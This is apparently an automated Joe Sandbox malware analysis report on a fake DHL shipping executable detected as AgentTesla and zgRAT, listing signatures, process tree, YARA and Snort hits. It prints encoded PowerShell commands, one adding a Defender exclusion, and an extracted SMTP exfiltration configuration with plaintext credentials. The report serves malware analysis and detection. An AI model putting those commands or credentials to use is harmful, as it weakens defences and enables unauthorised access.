Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL_Shipping_Document2.exe

Overview

General Information

Sample Name:DHL_Shipping_Document2.exe
Analysis ID:830438
MD5:e2f0b0afe1d1cabe6d0fc082fadde43f
SHA1:8ab34b84b1475d03beda51c79f841ec98e97e350
SHA256:9080fc157a688b3946bb805b004da99ebf4415ba1d9b46e3dac43a6f02dd11c3
Tags:AgentTeslaDHLexe
Infos:

Detection

AgentTesla, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected zgRAT
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Creates multiple autostart registry keys
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Encrypted powershell cmdline option found
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • DHL_Shipping_Document2.exe (PID: 5972 cmdline: C:\Users\user\Desktop\DHL_Shipping_Document2.exe MD5: E2F0B0AFE1D1CABE6D0FC082FADDE43F)
    • powershell.exe (PID: 912 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 3624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 324 cmdline: "C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA== MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 2072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 5016 cmdline: powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
    • Lutyzivrgpnlssvvvftlfile.exe (PID: 5084 cmdline: "C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe" MD5: B1DFD2B85A645040D8C89D0FCED4340A)
    • InstallUtil.exe (PID: 1764 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe MD5: 6EE3F830099ADD53C26DF5739B44D608)
  • explorers.exe (PID: 2364 cmdline: "C:\Users\user\AppData\Local\explorers.exe" MD5: E2F0B0AFE1D1CABE6D0FC082FADDE43F)
  • KbWSe.exe (PID: 5916 cmdline: "C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe" MD5: B1DFD2B85A645040D8C89D0FCED4340A)
  • explorers.exe (PID: 612 cmdline: "C:\Users\user\AppData\Local\explorers.exe" MD5: E2F0B0AFE1D1CABE6D0FC082FADDE43F)
  • KbWSe.exe (PID: 2948 cmdline: "C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe" MD5: B1DFD2B85A645040D8C89D0FCED4340A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
zgRATNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Host": "smtp.thanhphoung-vn.com", "Username": "log@thanhphoung-vn.com", "Password": "smartyok4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000013.00000002.556924562.00000000023AC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000013.00000002.556924562.00000000023AC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000F.00000002.555838851.000000000244C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000F.00000002.555838851.000000000244C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.532957763.00000199242B0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            Click to see the 10 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.DHL_Shipping_Document2.exe.1990bb43928.2.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
              0.2.DHL_Shipping_Document2.exe.1990bb43928.2.raw.unpackMALWARE_Win_zgRATDetects zgRATditekSHen
              • 0x11c66:$s1: file:///
              • 0x11b74:$s2: {11111-22222-10009-11112}
              • 0x11bf6:$s3: {11111-22222-50001-00000}
              • 0xf8b7:$s4: get_Module
              • 0xea28:$s5: Reverse
              • 0x11779:$s6: BlockCopy
              • 0x11769:$s7: ReadByte
              • 0x11c78:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
              0.2.DHL_Shipping_Document2.exe.1991bf4df80.4.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                0.2.DHL_Shipping_Document2.exe.1991bf4df80.4.unpackMALWARE_Win_zgRATDetects zgRATditekSHen
                • 0xfe66:$s1: file:///
                • 0xafe9e:$s1: file:///
                • 0xfd74:$s2: {11111-22222-10009-11112}
                • 0xafdac:$s2: {11111-22222-10009-11112}
                • 0xfdf6:$s3: {11111-22222-50001-00000}
                • 0xafe2e:$s3: {11111-22222-50001-00000}
                • 0xdab7:$s4: get_Module
                • 0xadaef:$s4: get_Module
                • 0xcc28:$s5: Reverse
                • 0xacc60:$s5: Reverse
                • 0xf979:$s6: BlockCopy
                • 0xaf9b1:$s6: BlockCopy
                • 0xf969:$s7: ReadByte
                • 0xaf9a1:$s7: ReadByte
                • 0xfe78:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
                • 0xafeb0:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
                0.2.DHL_Shipping_Document2.exe.1991bed5f10.5.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                  Click to see the 15 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  Timestamp:192.168.2.3208.91.199.225496995872840032 03/20/23-11:34:28.478393
                  SID:2840032
                  Source Port:49699
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.198.143497045872851779 03/20/23-11:35:14.897311
                  SID:2851779
                  Source Port:49704
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.198.143497045872840032 03/20/23-11:35:14.897311
                  SID:2840032
                  Source Port:49704
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.199.225497035872840032 03/20/23-11:35:13.114104
                  SID:2840032
                  Source Port:49703
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.199.223496985872851779 03/20/23-11:34:24.041449
                  SID:2851779
                  Source Port:49698
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.198.143497025872851779 03/20/23-11:35:12.738289
                  SID:2851779
                  Source Port:49702
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.199.225496995872851779 03/20/23-11:34:28.478393
                  SID:2851779
                  Source Port:49699
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.199.225497035872030171 03/20/23-11:35:13.113999
                  SID:2030171
                  Source Port:49703
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.199.223497055872840032 03/20/23-11:35:15.831914
                  SID:2840032
                  Source Port:49705
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.199.223496985872840032 03/20/23-11:34:24.041449
                  SID:2840032
                  Source Port:49698
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.198.143497025872030171 03/20/23-11:35:12.738168
                  SID:2030171
                  Source Port:49702
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.199.223497055872030171 03/20/23-11:35:15.831914
                  SID:2030171
                  Source Port:49705
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.199.223497055872851779 03/20/23-11:35:15.831914
                  SID:2851779
                  Source Port:49705
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.199.225496995872030171 03/20/23-11:34:28.478287
                  SID:2030171
                  Source Port:49699
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.199.225497035872851779 03/20/23-11:35:13.114104
                  SID:2851779
                  Source Port:49703
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.198.143497045872030171 03/20/23-11:35:14.897278
                  SID:2030171
                  Source Port:49704
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.199.223496985872030171 03/20/23-11:34:24.041330
                  SID:2030171
                  Source Port:49698
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.198.143497025872840032 03/20/23-11:35:12.738289
                  SID:2840032
                  Source Port:49702
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: DHL_Shipping_Document2.exeReversingLabs: Detection: 38%
                  Source: DHL_Shipping_Document2.exeVirustotal: Detection: 33%Perma Link
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeAvira: detection malicious, Label: TR/Spy.Gen8
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeAvira: detection malicious, Label: TR/Spy.Gen8
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\explorers.exeReversingLabs: Detection: 38%
                  Machine Learning detection for sample
                  Source: DHL_Shipping_Document2.exeJoe Sandbox ML: detected
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\explorers.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeJoe Sandbox ML: detected
                  Source: 0.2.DHL_Shipping_Document2.exe.1991d39abb0.11.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "smtp.thanhphoung-vn.com", "Username": "log@thanhphoung-vn.com", "Password": "smartyok4"}
                  Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49697 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.3:49700 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49701 version: TLS 1.2
                  Source: DHL_Shipping_Document2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794097000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256 source: InstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: Doxfkywupn.pdb source: InstallUtil.exe, 00000011.00000002.556335374.00000294205D0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: InstallUtil.exe, 00000011.00000002.552825754.0000029417F5C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.000002941804D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.557517142.0000029420820000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: InstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794097000.00000004.00000800.00020000.00000000.sdmp

                  Networking

                  barindex
                  Snort IDS alert for network traffic
                  Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49698 -> 208.91.199.223:587
                  Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49698 -> 208.91.199.223:587
                  Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49698 -> 208.91.199.223:587
                  Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49699 -> 208.91.199.225:587
                  Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49699 -> 208.91.199.225:587
                  Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49699 -> 208.91.199.225:587
                  Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49702 -> 208.91.198.143:587
                  Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49702 -> 208.91.198.143:587
                  Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49702 -> 208.91.198.143:587
                  Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49703 -> 208.91.199.225:587
                  Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49703 -> 208.91.199.225:587
                  Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49703 -> 208.91.199.225:587
                  Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49704 -> 208.91.198.143:587
                  Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49704 -> 208.91.198.143:587
                  Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49704 -> 208.91.198.143:587
                  Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49705 -> 208.91.199.223:587
                  Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49705 -> 208.91.199.223:587
                  Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49705 -> 208.91.199.223:587
                  May check the online IP address of the machine
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.199242b0000.12.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1991c263270.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.532957763.00000199242B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox ViewIP Address: 208.91.198.143 208.91.198.143
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficTCP traffic: 192.168.2.3:49698 -> 208.91.199.223:587
                  Source: global trafficTCP traffic: 192.168.2.3:49699 -> 208.91.199.225:587
                  Source: global trafficTCP traffic: 192.168.2.3:49702 -> 208.91.198.143:587
                  Source: global trafficTCP traffic: 192.168.2.3:49698 -> 208.91.199.223:587
                  Source: global trafficTCP traffic: 192.168.2.3:49699 -> 208.91.199.225:587
                  Source: global trafficTCP traffic: 192.168.2.3:49702 -> 208.91.198.143:587
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D80A047000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794366000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D80A047000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCert
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.000002979409E000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D809D7D000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
                  Source: explorers.exe, 00000016.00000002.554544853.0000029794368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrusted
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.000002979409E000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.000002979409E000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D809D7D000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
                  Source: Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.545974916.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000003.396387284.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.548180478.0000000000899000.00000004.00000020.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000003.479323373.0000000000891000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D80A047000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794366000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D80A047000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCert
